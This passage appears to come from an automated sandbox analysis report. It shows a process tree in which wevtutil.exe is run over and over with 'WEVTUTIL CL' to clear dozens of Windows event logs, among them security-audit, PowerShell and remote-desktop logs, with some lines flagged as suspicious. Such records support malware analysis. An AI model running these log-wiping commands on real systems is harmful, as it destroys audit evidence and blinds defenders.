- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Feedback-Service-TriggerProvider"
    3⤵
    PID:3012
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:1700
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    PID:1936
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:2600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:2476
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Forwarding/Operational"
    3⤵
    PID:788
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-GettingStarted/Diagnostic"
    3⤵
    PID:1592
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    PID:452
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HAL/Debug"
    3⤵
    PID:1544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:492
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:692
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Help/Operational"
    3⤵
    PID:2464
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:2520
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    PID:588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:2956
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:2748
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:1932
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HotStart/Diagnostic"
    3⤵
    PID:1444
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:2008
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IKE/Operational"
    3⤵
    PID:2820
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:2120
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IPBusEnum/Tracing"
    3⤵
    PID:2400
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:1820
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    PID:2444
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-International/Operational"
    3⤵
    PID:608
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:2220
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:1392
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    PID:2216
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:3068
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:2524
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:2880
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:724
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:712
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:1836
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Diagnostic"
    3⤵
    PID:1700
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:2544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:2724
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:2624
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:2716
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:2356
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:1308
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:2288
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:2572
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:1092
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:3040
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:2644
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:2016
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MCT/Operational"
    3⤵
    PID:956
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:2624
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:2376
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:996
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:2480
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:2212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:1776
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:1572
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:2616
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:1816
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:720
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:2892
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:1948
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:2568
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:2340
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:1600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:2472
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:1820
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:2444
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:2276
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:852
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:976
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:2184
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkAccessProtection/Operational"
    3⤵
    PID:2188
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkAccessProtection/WHC"
    3⤵
    PID:2584
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:2628
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:2384
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:2488
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    PID:452
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    PID:2808
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:3040
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:2624
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OOBE-Machine/Diagnostic"
    3⤵
    PID:2376
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    PID:2776
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:3060
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:2460
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    PID:2212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:1544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    PID:2972
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    - Enumerates connected drives
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:492
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PeopleNearMe/Operational"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    - Enumerates connected drives
    PID:2072
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:2820
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerCfg/Diagnostic"
    3⤵
    PID:2872
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerCpl/Diagnostic"
    3⤵
    PID:1228
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    PID:2356
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    PID:1308
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell/Operational"
    3⤵
    PID:2240
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:2120
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService/Admin"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService/Debug"
    3⤵
    PID:544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    PID:608
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-QoS-qWAVE/Debug"
    3⤵
    PID:1864
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RPC-Proxy/Debug"
    3⤵
    PID:2444
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:992
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RPC/EEInfo"
    3⤵
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Analytic"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Operational"
    3⤵
    PID:2244
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Analytic"
    3⤵
    PID:1556
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Operational"
    3⤵
    PID:2188
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Recovery/Operational"
    3⤵
    PID:2408
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
    3⤵
    PID:2936
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:1528
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Admin"
    3⤵
    PID:576
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Operational"
    3⤵
    PID:2648
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Tracing"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
    3⤵
    PID:956
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
    3⤵
    PID:1036
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
    3⤵
    PID:2816
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:1744
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
    3⤵
    PID:2776
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ResourcePublication/Tracing"
    3⤵
    PID:2476
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RestartManager/Operational"
    3⤵
    PID:2772
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Search-Core/Diagnostic"
    3⤵
    PID:2212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
    3⤵
    PID:3024
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
    3⤵
    PID:1776
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-IdentityListener/Operational"
    3⤵
    PID:1572
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-SPP/Perf"
    3⤵
    PID:2172
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sens/Debug"
    3⤵
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:2616
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Services-Svchost/Diagnostic"
    3⤵
    PID:1700
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Services/Diagnostic"
    3⤵
    PID:1808
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Setup/Analytic"
    3⤵
    PID:1616
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupCl/Analytic"
    3⤵
    PID:1264
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupQueue/Analytic"
    3⤵
    PID:2716
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupUGC/Analytic"
    3⤵
    PID:2260
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
    3⤵
    PID:1632
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
    3⤵
    PID:2864
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:2884
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
    3⤵
    PID:2120
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
    3⤵
    PID:2208
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    PID:2592
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Core/Diagnostic"
    3⤵
    PID:2760
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
    3⤵
    PID:1092
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Shwebsvc"
    3⤵
    PID:2632
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shsvcs/Diagnostic"
    3⤵
    PID:2220
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sidebar/Diagnostic"
    3⤵
    PID:856
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Speech-UserExperience/Diagnostic"
    3⤵
    PID:2580
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Spell-Checking/Analytic"
    3⤵
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SpellChecker/Analytic"
    3⤵
    PID:1560
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StickyNotes/Admin"
    3⤵
    PID:2028
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StickyNotes/Debug"
    3⤵
    PID:476
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StickyNotes/Diagnostic"
    3⤵
    PID:708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorDiag/Operational"
    3⤵
    PID:2584
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorPort/Operational"
    3⤵
    PID:964
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Subsys-Csr/Operational"
    3⤵
    PID:2160
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Subsys-SMSS/Operational"
    3⤵
    PID:2712
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Superfetch/Main"
    3⤵
    PID:2648
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    PID:3048
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:916
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SystemHealthAgent/Diagnostic"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TCPIP/Diagnostic"
    3⤵
    PID:280
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Debug"
    3⤵
    PID:1676
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Diagnostic"
    3⤵
    PID:3012
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Debug"
    3⤵
    PID:2476
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Diagnostic"
    3⤵
    PID:3060
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TZUtil/Operational"
    3⤵
    PID:2772
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Debug"
    3⤵
    PID:692
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Diagnostic"
    3⤵
    PID:1448
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Operational"
    3⤵
    PID:2844
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TaskbarCPL/Diagnostic"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
    3⤵
    PID:1416
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
    3⤵
    PID:2252
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
    3⤵
    PID:2432
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
    3⤵
    PID:588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
    3⤵
    PID:720
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
    3⤵
    PID:1648
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
    3⤵
    PID:2668
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
    3⤵
    PID:1824
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
    3⤵
    PID:1752
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
    3⤵
    PID:1064
- - C:\Windows\system32\wevtutil.exe
